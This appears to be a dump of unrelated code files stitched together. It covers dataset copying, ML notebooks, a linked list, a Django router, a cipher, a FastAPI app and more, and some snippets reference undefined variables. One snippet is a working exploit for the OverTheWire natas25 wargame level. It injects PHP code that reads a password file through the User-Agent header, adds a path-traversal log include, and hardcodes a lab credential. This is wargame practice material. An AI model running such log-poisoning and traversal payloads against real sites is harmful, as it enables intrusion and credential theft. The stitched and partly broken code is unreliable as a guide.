if not os.path.exists('source_data_train/' + class_name_en):
os.mkdir('source_data_train/' + class_name_en)
for i in range(5000):
print(i)
shutil.copy(dir_path + '/' + file_list[i], 'source_data_train/' + class_name_en + '/' + str(i) + '.txt')
if not os.path.exists('source_data_test/' + class_name_en):
os.mkdir('source_data_test/' + class_name_en)
for i in range(5000, 10000):
print(i)
shutil.copy(dir_path + '/' + file_list[i], 'source_data_test/' + class_name_en + '/' + str(i - 5000) + '.txt')
# class_name = '社会'
# class_name_en = 'Society'
# dir_path = 'D:/下载/THUCNews/THUCNews/' + class_name
# file_list = os.listdir(dir_path)
# print(class_name + ':' + str(len(file_list)))
#
# if not os.path.exists('source_data_train/' + class_name_en):
# os.mkdir('source_data_train/' + class_name_en)
# for i in range(5000):
# print(i)
# shutil.copy(dir_path + '/' + file_list[i], 'source_data_train/' + class_name_en + '/' + str(i) + '.txt')
#
# if not os.path.exists('source_data_test/' + class_name_en):
# os.mkdir('source_data_test/' + class_name_en)
# for i in range(5000, 10000):
# print(i)
# shutil.copy(dir_path + '/' + file_list[i], 'source_data_test/' + class_name_en + '/' + str(i - 5000) + '.txt')
|
998,183 | e3ed13673c44664007218104d153448ccccef9cf | #!/usr/bin/python3
import requests
username = "natas25"
password = "GHF6X7YwACaYYssHVY05cFq83hRktl4c"
url = 'http://'+username+'.natas.labs.overthewire.org/'
info = 'http://'+username+'.natas.labs.overthewire.org/var/www/natas/natas25/logs/natas25_'
session = requests.session()
data = {'lang' : '../etc/natas_webpass/natas26'}
#response = session.post(url , data = {'lang' : '../etc/natas_webpass/natas26'},auth = (username, password))
response = session.get(url ,auth = (username, password))
content = response.text
print("The PHPSESSID of this session is:\t"+session.cookies['PHPSESSID'])
cook = str(session.cookies['PHPSESSID'])
print("="*50)
#headers = {"User-Agent" : "<?php system('cat /etc/natas_webpass/natas26'); ?>"}
headers = {"User-Agent" : "<?php echo exec('cat /etc/natas_webpass/natas26'); ?>"}
response = session.post(url, headers = headers ,data = {'lang' : '..././..././..././..././..././var/www/natas/natas25/logs/natas25_'+cook+'.log'} , auth = (username, password))
content = response.text
print(content)
|
998,184 | 80caafddd1f27cb6cff631a9e7f44c65989b8410 | # Introduction: How H1st.AI enables the Industrial AI Revolution
This tutorial will teach you how H1st AI can help solve the Cold Start problem in domains where labeled data is not available or prohibitively expensive to obtain.
One example of such a domain is cybersecurity, which is increasingly looking forward to adopting ML to detect intrusions. Another domain is predictive maintenance that tries to anticipate industrial machine failures before they happen. In both domains, labels are expensive because fundamentally these occurrences are rare and costly (as compared to NLP where e.g. sentiment are common and labels can be obtained i.g. via crowdsourcing or weak supervision).
Yet this is a fundamental challenge of Industrial AI.
<img src="http://docs.arimo.com/H1ST_AI_Tutorial/img/batman h1st.ai.jpg" alt="H1st.AI woke meme" style="float: left; margin-right: 20px; margin-bottom: 20px;" width=320px height=320px>
Jurgen Schmidhuber, one of AI & deep learning's pioneer, [remarked in his 2020s outlook that](http://people.idsia.ch/~juergen/2010s-our-decade-of-deep-learning.html#Sec.%207) in the last decade AI "excelled in virtual worlds, e.g., in video games, board games, and especially on the major WWW platforms", but the main challenge for the next decades is for AI to be "driving industrial processes and machines and robots".
As pioneers in Industrial AI who regularly work with massive global fleets of IoT equipment, Arimo & Panasonic whole-heartedly agrees with this outlook. Importantly, many industrial AI use cases with significant impact have become urgent and demand solutions now that requires a fresh approach. We will work on one such example in this tutorial: detection intrusion in automotive cybersecurity.
We’ll learn that using H1st.AI we can tackle these problems and make it tractable by leveraging human experience and data-driven models in a harmonious way. Especially, we’ll learn how to:
* Perform use-case analysis to decompose problems and adopt different models at the right level of abstractions
* Encode human experience as a model
* Combine human and ML models to work in tandem in a H1st.Graph
Too many tutorials, esp data science ones, start out with some toy applications and the really basic stuff, and then stalls out on the more complex real-world scenario. This one is going to be different.
So, grab a cup of coffee before you continue :)
If you can't wait, go ahead and [star our Github repository](https://github.com/h1st-ai/h1st) and check out the "Quick Start" section. We're open-source!
```{toctree}
:hidden:
:titlesonly:
Automotive Cybersecurity - A Cold Start Problem.ipynb
Monolithic AD & ML Approaches and Why They are Unsatisfactory.ipynb
Using H1st.AI to Encode Human Insights as a Model and Harmonize Human + ML in a H1st.Graph.ipynb
Summary & Further Resources
```
|
998,185 | 36182f4eefe3a27364f75bf1b251f8a8584224ae | '''
Doubly linked list (ADT).
'''
class DoublyLinkedList(object):
class Node(object):
'''
Data input (referrenced as the node below) can be of any format (or within
any other data type.)
'''
def __init__(self, data = None, prev = None, next = None):
self.data = data
self.prev = prev
self.next = next
def disconnect(self):
self.data = None
self.prev = None
self.next = None
def __init__(self):
'''
Since the header and trailer nodes (or sentinels) are purely for position,
they do hold data.
'''
self.header = DoublyLinkedList.Node()
self.trailer = DoublyLinkedList.Node()
self.header.next = self.trailer
self.trailer.prev = self.header
self.size = 0
def __len__(self):
return self.size
def is_empty(self):
return (len(self) == 0)
#---------------------First and Last Data Nodes-----------------------
def first_node(self):
'''
Returns the first node of a Doubly Linked List that holds data.
'''
if (self.is_empty()):
raise Exception("List is empty!")
else:
return self.header.next
def last_node(self):
'''
Returns the last node of a Doubly Linked List that holds data.
'''
if (self.is_empty()):
raise Exception("List is empty!")
else:
return self.trailer.prev
#---------------------Adding Data------------------------------------
def add_after(self, node, data):
'''
Helper function for adding data to first and last locations.
'''
prev = node
succ = node.next
new_node = DoublyLinkedList.Node(data, prev, succ)
prev.next = new_node
succ.prev = new_node
self.size += 1
return new_node
def add_first(self, data):
return self.add_after(self.header, data)
def add_last(self, data):
return self.add_after(self.trailer.prev, data)
def add_before(self, node, data):
return self.add_after(node.prev, data)
def insert_sorted(self, elem):
if self.is_empty():
self.first_node().data = elem
self.size += 1
if self.first_node().data >= elem:
old_first = self.first_node()
new_first = DoublyLinkedList.Node(elem, self.header, old_first)
self.header.next = new_first
old_first.prev = new_first
self.size += 1
elif self.last_node().data >= elem:
old_last = self.last_node()
new_last = DoublyLinkedList.Node(elem, old_last, self.trailer)
self.trailer.prev = new_last
old_last.next = new_last
self.size += 1
else:
cursor = self.first_node().next
while cursor is not self.trailer:
if cursor.data >= elem:
new_node = DoublyLinkedList.Node(elem, cursor.prev, cursor)
cursor.prev.next = new_node
cursor.prev = new_node
else:
cursor = cursor.next
self.size += 1
return
#---------------------Deleting Data---------------------------------
def delete_node(self, node):
pred = node.prev
succ = node.next
pred.next = succ
succ.prev = pred
self.size -= 1
data = node.data
node.disconnect()
return data
def delete_first(self):
if (self.is_empty()):
raise Exception("List is empty!")
return self.delete_node(self.first_node())
def delete_last(self):
if (self.is_empty()):
raise Exception("List is empty!")
return self.delete_node(self.last_node())
#---------------------Traversal-------------------------------------
def __iter__(self):
if (self.is_empty()):
return
cursor = self.first_node()
while cursor is not self.trailer:
yield cursor.data
cursor = cursor.next
def __repr__(self):
return "[" + " <--> ".join([str(item) for item in self]) + "]"
'''
lnk_lst1=DoublyLinkedList()
lnk_lst1.add_first(4)
lnk_lst1.add_first(2)
lnk_lst1.add_last(7)
lnk_lst1.add_last(3)
lnk_lst1.add_last([1,2,3])
print(lnk_lst1)
lnk_lst1.delete_first()
print(lnk_lst1)
lnk_lst2 = DoublyLinkedList()
lnk_lst2.add_first(13)
print(lnk_lst2.__len__())
lnk_lst2 = DoublyLinkedList()
lnk_lst2.add_first(2)
lnk_lst2.add_last(4)
print(lnk_lst2)
lnk_lst2.insert_sorted(3)
print(lnk_lst2)
'''
if __name__ == "__main__":
import doctest
doctest.testmod() |
998,186 | c04d587ec5b211eabcc7a217a5b49e9a023ef501 | from numpy import mean
from numpy import std
import numpy as np
import pandas as pd
import sklearn
import math
import os
from sklearn.metrics import log_loss, accuracy_score, classification_report
from sklearn.metrics import matthews_corrcoef, make_scorer, roc_auc_score, roc_curve
from sklearn.model_selection import KFold, cross_val_score
from sklearn.model_selection import GridSearchCV
from sklearn import datasets,linear_model,preprocessing
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier
from xgboost import XGBClassifier
from sklearn.model_selection import KFold
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split as split
from sklearn.model_selection import cross_val_score
from sklearn.linear_model import LinearRegression, LogisticRegression, Lasso, Ridge
""" Hello, tutor. I used google colab to train and test, I imported the csv file from google drive
if you want to test the .csv on you pc, you probably need to
change the file path , thanks
"""
from google.colab import drive
drive.mount('/content/drive')
Train = pd.read_csv('/content/drive/MyDrive/9417 Proj/train.csv')
Test = pd.read_csv('/content/drive/MyDrive/9417 Proj/test.csv')
Sample = pd.read_csv('/content/drive/MyDrive/9417 Proj/sampleSubmission.csv')
print(Train.head())
print("Train Set Shape:",end="")
print(Train.shape)
print(Test.head())
print("Test Set Shape:",end="")
print(Train.shape)
plt.figure(figsize=(10, 8))
sns.heatmap(Train.corr(), annot=True,cmap="GnBu_r")
'''Split Train into Train_Y and Train_X
Train_Y is the first column 'ACTION'
Train_X is the combination of other columns
Test_X is the combination after Test drops column 'id'
'''
Train_Y = Train["ACTION"]
Train_X = Train.drop("ACTION",axis=1)
Column_ID = Test["id"]
Test_X = Test.drop("id",axis=1)
Train_X, Valid_X, Train_Y, Valid_Y = split(Train_X, Train_Y, test_size=0.2, random_state=0, stratify=Train_Y)
print("Train set after pre-processing:",end="")
print(Train_X.head())
print("Test set after pre-processing:",end="")
print(Test_X.head())
Train_X1, Train_Y1 = np.array(Train_X), np.array(Train_Y)
Valid_X1, Valid_Y1 = np.array(Valid_X), np.array(Valid_Y)
for i in Train_X.describe().columns:
sns.boxplot(Train_X[i].dropna(), color='g')
plt.show()
import catboost
from catboost.eval.evaluation_result import *
from catboost import CatBoostClassifier, Pool, MetricVisualizer
P1 = Pool(data=Train_X, label=Train_Y, cat_features=[0,1,2,3,4,5,6,7,8])
values = Model.get_feature_importance(data=P1, type='ShapValues')
expected_val = values[1,-1]
shap_val = values[:,:-1]
"Smaple index 1"
import shap
shap.initjs()
shap.force_plot(expected_val, shap_val[1,:], Train_X.iloc[1,:])
"Smaple index 50"
import shap
shap.initjs()
values = Model.get_feature_importance(data=P1, type='ShapValues')
expected_val = values[50,-1]
shap_val = values[:,:-1]
shap.force_plot(expected_val, shap_val[50,:], Train_X.iloc[50,:])
import shap
shap.initjs()
values = Model.get_feature_importance(data=P1, type='ShapValues')
shap_val = values[:,:-1]
shap.summary_plot(shap_val, Train_X, plot_type="bar")
shap.summary_plot(shap_val, Train_X)
shap.dependence_plot("RESOURCE", shap_values, Train_X, interaction_index=None)
shap.dependence_plot("MGR_ID", shap_values, Train_X, interaction_index=None)
shap.dependence_plot("ROLE_DEPTNAME", shap_values, Train_X, interaction_index=None)
shap.dependence_plot("ROLE_TITLE", shap_values, Train_X,interaction_index=None)
shap.dependence_plot("ROLE_FAMILY_DESC", shap_values, Train_X, interaction_index=None)
import shap
shap.initjs()
x_small = Train_X.iloc[0:200]
shap_small = shap_values[:200]
shap.force_plot(expected_value, shap_small, x_small) |
998,187 | 80063c3bb4646b380579899f24b1649d13f8f374 | print("Hello World!\n Just testing the work folder and commands to run via terminal") |
998,188 | 471d141d97d5a5d70da45429f0ab2ca0b89f28ff | """
68. Ward法によるクラスタリングPermalink
国名に関する単語ベクトルに対し,Ward法による階層型クラスタリングを実行せよ.
さらに,クラスタリング結果をデンドログラムとして可視化せよ.
"""
from scipy.cluster.hierarchy import linkage, dendrogram
from knock67 import make_dataframe, collect_countries
import matplotlib.pyplot as plt
import pandas as pd
if __name__ == "__main__":
dataframe = make_dataframe(collect_countries())
result = linkage(dataframe.iloc[:, 1:],
method="ward",
metric="euclidean")
pd.set_option("display.max_rows", 116)
#print(dataframe[0])
#print(dataframe[0].values)
a = dendrogram(result, labels=dataframe[0].values)
plt.show()
"""
0 Afghanistan
1 Albania
2 Algeria
3 Angola
4 Armenia
5 Australia
6 Austria
7 Azerbaijan
8 Bahamas
9 Bahrain
10 Bangladesh
11 Belarus
12 Belgium
13 Belize
14 Bhutan
15 Botswana
16 Bulgaria
17 Burundi
18 Canada
19 Chile
20 China
21 Croatia
22 Cuba
23 Cyprus
24 Denmark
25 Dominica
26 Ecuador
27 Egypt
28 England
29 Eritrea
30 Estonia
31 Fiji
32 Finland
33 France
34 Gabon
35 Gambia
36 Georgia
37 Germany
38 Ghana
39 Greece
40 Greenland
41 Guinea
42 Guyana
43 Honduras
44 Hungary
45 Indonesia
46 Iran
47 Iraq
48 Ireland
49 Italy
50 Jamaica
51 Japan
52 Jordan
53 Kazakhstan
54 Kenya
55 Kyrgyzstan
56 Laos
57 Latvia
58 Lebanon
59 Liberia
60 Libya
61 Liechtenstein
62 Lithuania
63 Macedonia
64 Madagascar
65 Malawi
66 Mali
67 Malta
68 Mauritania
69 Moldova
70 Montenegro
71 Morocco
72 Mozambique
73 Namibia
74 Nepal
75 Nicaragua
76 Niger
77 Nigeria
78 Norway
79 Oman
80 Pakistan
81 Peru
82 Philippines
83 Poland
84 Portugal
85 Qatar
86 Romania
87 Russia
88 Rwanda
89 Samoa
90 Senegal
91 Serbia
92 Slovakia
93 Slovenia
94 Somalia
95 Spain
96 Sudan
97 Suriname
98 Sweden
99 Switzerland
100 Syria
101 Taiwan
102 Tajikistan
103 Thailand
104 Tunisia
105 Turkey
106 Turkmenistan
107 Tuvalu
108 Uganda
109 Ukraine
110 Uruguay
111 Uzbekistan
112 Venezuela
113 Vietnam
114 Zambia
115 Zimbabwe
""" |
998,189 | e0998c54df03880afb47af50013bf18be820cece | """Inject a given image into the SinGAN. This can be used for Super-Resolution, Paint-to-Image, Harmonization and Editiing."""
import torch
from src.singan import SinGAN
import argparse
from datetime import datetime
from skimage import io
import numpy as np
from src.image import load_img
from skimage.color import lab2rgb
# Arguments
parser = argparse.ArgumentParser()
parser.add_argument('--device', type=str, default='cuda', help='cuda or cpu')
parser.add_argument('--path', type=str, default='./assets/clip_art.png', help='path to clip art image')
parser.add_argument('--save_path', type=str, default='./train', help='path to save images')
parser.add_argument('--scale', type=int, default=2, help='injection_scale scale, from 0 to N')
# Get arguments
args = parser.parse_args()
# Init variables
device = torch.device('cuda:0') if args.device=='cuda' else torch.device('cpu')
path = args.path
injection_scale = args.scale
# Load clip art image
clip_art = load_img(path, device)
# Create SinGAN model
singan = SinGAN(device, 0.1, 0.1, 10, 1, 1, 1, None)
# Load trained model (look at standard path)
singan.load()
# Check for training progress of SinGAN
if not singan.trained_scale == singan.N:
print('SinGAN is not completely trained! You can use train.py --load to train it completely.')
input('Press enter to continue')
# Generate new images
img = singan.paint_to_img(clip_art, injection_scale=injection_scale)
# Save images use as name the current date
now = datetime.now()
date = now.strftime('%Y_%m_%d-%H_%M_%S')
# Save image
PATH = args.save_path + '/clipart_' + date + f'.png'
img = img[0].cpu().detach().permute(1, 2, 0)
img = img.numpy()
img[:,:,0] += 1
img[:,:,0] *= 50
img[:,:,1:] *= 127.5
img[:,:,1:] -= 0.5
img = (lab2rgb(img)*255).astype(np.uint8)
io.imsave(PATH, img) |
998,190 | a654dd5d13eaeeb2b96edce9c1c896f240b599af | import pygame as pyg
from fileslibparcial.libreria import *
if __name__ == "__main__":
pyg.init()
pantalla = pyg.display.set_mode([ANCHO,ALTO])
changeCentroPlano(200, 300)
# Cuadrado
cuadrado = [[100,100], [-100,100], [-100,-100], [100, -100]]
# Linea separadora
linea = [[210, 110], [210, -110]]
linea = transformToCarte(linea)
#Valores Polares
r = getR(cuadrado[0][0], 45)
angulo = 0
puntosq = polarToCart(r, angulo)
# Puntos de la grafica
gfpoints = []
reloj = pyg.time.Clock()
fin = False
while(not fin):
for event in pyg.event.get():
if event.type == pyg.QUIT:
fin = True
#Logica
pantalla.fill([0,0,0])
# Objetos fijos (Plano, Cuadrado, separacion)
drawplano(pantalla)
pyg.draw.polygon(pantalla, [0,250,0], transformToCarte(cuadrado), 1)
pyg.draw.line(pantalla, MOSTAZA, linea[0], linea[1])
# Animación Circulo
#pyg.draw.circle(pantalla, [250,0,0], getplanopos(puntosq[0], puntosq[1]), 1)
#Linea a rotar
pinicial = getplanopos(0, 0)
pfinal = getplanopos(puntosq[0], puntosq[1])
#pyg.draw.line(pantalla, ROSA, pinicial, pfinal)
#Logica de los limites para la linea rotante
puntosquare = getPointSquare(100, 100, puntosq[0], puntosq[1], angulo)
psf = getplanopos(puntosquare[0], puntosquare[1])
pyg.draw.line(pantalla, MOSTAZA, pinicial, psf)
#Logica grafica moviendoce
putandmove(pantalla, gfpoints, psf[1], [linea[0][0], 300])
#Reiniciar angulo
if(angulo == 360):
angulo = 0
else:
# Incrementador
angulo += 1
puntosq = polarToCart(r, angulo)
pyg.display.flip()
reloj.tick(60)
print("Fin del programa")
|
998,191 | c421c7a1c8a5d97eca8ca38bf04c44fb0c24eba7 | #!/usr/bin/env python
# encoding: utf-8
'''
@author: kdb
@file: urls.py
@time: 2018/7/15 0015 下午 8:47
'''
from django.conf.urls import url
from users.views import register,UserUpdateView
app_name = 'users'
urlpatterns = [
url(r'^register/',register,name='register'),
url(r'^user_update/(?P<pk>\d+)/$',UserUpdateView.as_view(),name='user_update'),
] |
998,192 | d34e04e749d535bee499c446419819858a05cb55 | from string import ascii_lowercase, ascii_uppercase
LENGTH = len(ascii_lowercase)
def rotate(text, rot):
"""
Implementation of the rotational cipher, also sometimes called the Caesar cipher.
:param text: Text to encode
:param rot: How many places to rotate. 13 means rotate by 13 places.
:return: Encoded text
"""
ret = []
for char in text:
ret.append(convert(char, rot))
return ''.join(ret)
def convert(char, rot):
val = ord(char)
if char in ascii_lowercase:
return ascii_lowercase[(rot + ascii_lowercase.find(char)) % LENGTH]
elif char in ascii_uppercase:
return ascii_uppercase[(rot + ascii_uppercase.find(char)) % LENGTH]
else:
return chr(val)
|
998,193 | b4aa9f367639087855e9ad64585720487ca83d63 | import re
from threading import Thread
from os.path import getsize
from time import sleep
tfname = './x2.txt'
sfname = './x2_completed.txt'
sfname2 = './x2_error.txt'
re_control_char = re.compile('[\x00-\x09|\x0b-\x0c|\x0e-\x1f]')
re_email = re.compile(r'\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*')
completed = False
def status_monitor(target, save_files):
total = '%.2fMB' % (getsize(target)/1024/1024)
while not completed:
completed_size = 0
for fname in save_files:
completed_size += getsize(fname)
print('%.2f/%s' % (completed_size/1024/1024, total))
sleep(1)
with open(tfname, encoding="GB18030", errors ='ignore') as f, open(sfname, 'w', encoding="GB18030", errors ='ignore') as sf, open(sfname2, 'w', encoding="GB18030", errors ='ignore') as sferror:
Thread(target=status_monitor, args=(tfname, (sfname, sfname2))).start()
for line in f:
line = re_control_char.sub('', line.strip())
data = line.split(':')
email = ''
for i in range(len(data)):
if '@' in data[i].strip('@'):
email = data.pop(i)
data = [data[0], email, data[1]]
break
if email and not ((data[0]=='' and data[1]=='') or (len(data[2]) < 4)):
sf.write('~||`'.join(data) + '\n')
continue
sferror.write(line + '\n')
completed = True |
998,194 | 8636d9ebd02335f9d333663d8a6c564d4f156afe |
import pandas as pd
import joblib
from fastapi import FastAPI
app = FastAPI()
# define a root `/` endpoint
@app.get("/")
def index():
return {"ok": True}
# Implement a /predict endpoint
@app.get("/predict/")
def create(acousticness,
danceability,
duration_ms,
energy,
explicit,
id,
instrumentalness,
key,
liveness,
loudness,
mode,
name,
release_date,
speechiness,
tempo,
valence,
artist):
X = pd.DataFrame(dict(
acousticness = [float(acousticness)],
danceability = [float(danceability)],
duration_ms = [int(duration_ms)],
energy = [float(energy)],
explicit = [int(explicit)],
id = [id],
instrumentalness = [float(instrumentalness)],
key = [int(key)],
liveness = [float(liveness)],
loudness = [float(loudness)],
mode = [int(mode)],
name = [name],
release_date = [release_date],
speechiness = [float(speechiness)],
tempo = [float(tempo)],
valence = [float(valence)],
artist = [artist]))
pipeline = joblib.load('model.joblib')
results = pipeline.predict(X)
pred = float(results[0])
return dict(artist=artist,
name=name,
popularity=pred)
|
998,195 | b76282137c0f2e95c99ab2fabe491e72db487024 | import pprint
from django.conf import settings
from django.core.management.base import BaseCommand
import requests
class Command(BaseCommand):
def handle(self, *args, **options):
item_id = 171266044
url = settings.FLYER['item_url'].format(item_id)
response = requests.get(url)
data = response.json()
pprint.pprint(data)
|
998,196 | c54a19bc49f9996e6bf9d26b495f877b213b27d4 | import requests
import os, csv, time
url = 'http://stats.moe.gov.tw/files/detail/{0}/{0}_student.csv'
for year in range(103, 109):
csvdata = requests.get(url.format(year)).text
rows = csvdata.split('\n')
data = list()
columns = rows[0].split(',')
for row in rows[1:]:
try:
row = row.split(',')
item = list()
for f_index in range(1, 5):
item.append(row[f_index].replace('"', ''))
data.append(item)
except:
pass
filename = os.path.basename(url.format(year))
print(filename, "is writing...")
with open(filename, "w", encoding='utf-8', newline="") as fp:
writer = csv.writer(fp)
writer.writerow(columns[1:5])
writer.writerows(data)
time.sleep(3)
print("done") |
998,197 | 64fbeff8cce0f3b890e14ef82cae3fcc715676c3 | # coding: utf-8
import psycopg2
DBNAME = "kumo"
DEFAULT_LIMIT = 100
def is_station_id(station_id):
cnx = psycopg2.connect("dbname={}".format(DBNAME))
with cnx.cursor() as cur:
cur.execute("SELECT last_value FROM stations_id_seq;")
last_value = cur.fetchone()[0]
return station_id <= last_value
def is_country(country):
return country in countries()
def station(by_id):
cnx = psycopg2.connect("dbname={}".format(DBNAME))
with cnx.cursor() as cur:
cur.execute("SELECT * FROM stations WHERE id = %(station_id)s;",
{'station_id': by_id})
return cur.fetchall()
def stations(limit=DEFAULT_LIMIT, country=None, station_type=None):
cnx = psycopg2.connect("dbname={}".format(DBNAME))
query = ["SELECT * FROM stations"]
params = {}
if country is not None:
params['country'] = country
query.append(" country = %(country)s")
if station_type is not None:
params['type'] = station_type
query.append(" type = %(type)s")
query_limit = " LIMIT %s" % limit
if len(query) > 1:
query = query[0] + ' WHERE ' + 'AND'.join(query[1:])
else:
query = query[0]
query += query_limit
with cnx.cursor() as cur:
cur.execute(query, params)
return cur.fetchall()
def countries(limit=DEFAULT_LIMIT):
cnx = psycopg2.connect("dbname={}".format(DBNAME))
with cnx.cursor() as cur:
cur.execute("SELECT DISTINCT country FROM stations ORDER BY country LIMIT %s;" % limit)
return [x[0] for x in cur.fetchall()]
def by_country(name, limit=DEFAULT_LIMIT, station_type=None):
cnx = psycopg2.connect("dbname={}".format(DBNAME))
params = {'name': name.capitalize()}
query = "SELECT * FROM stations WHERE country = %(name)s"
if station_type is not None:
params['type'] = station_type
query += " AND type = %(type)s"
query += " LIMIT %s" % limit
with cnx.cursor() as cur:
cur.execute(query, params)
return cur.fetchall()
def species(limit=DEFAULT_LIMIT):
cnx = psycopg2.connect("dbname={}".format(DBNAME))
with cnx.cursor() as cur:
cur.execute("SELECT DISTINCT species FROM stations ORDER BY species ASC LIMIT %s ;" % limit)
return [x[0] for x in cur.fetchall()]
def by_species(name):
cnx = psycopg2.connect("dbname={}".format(DBNAME))
with cnx.cursor() as cur:
cur.execute("SELECT * FROM stations WHERE species = %(name)s",
{'name': name})
return cur.fetchall()
|
998,198 | 8e708c2da757183ff4be0866e09a73cad85b3cad | from tensorflow.keras.models import load_model
if __name__ == '__main__':
# Load the data
# ...
# Preprocessing
# ...
# Load the trained models
#for example
model_task1 = load_model('./nn_task1.h5')
# Predict on the given samples
#for example
y_pred_task1 = model_task1.predict(x_test)
# Evaluate the missclassification error on the test set
# for example
assert y_test.shape == y_pred_task1.shape
acc = ... # evaluate accuracy with proper function
print("Accuracy model task 1:", acc)
|
998,199 | 120804177bd3e537a5a8ed11c9eb9ded8d07731d | class first():
def method(self):
print('method of first class')
class second():
def method(self):
print('method of second class')
obj=first()
obj.method()
obj=second()
obj.method()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.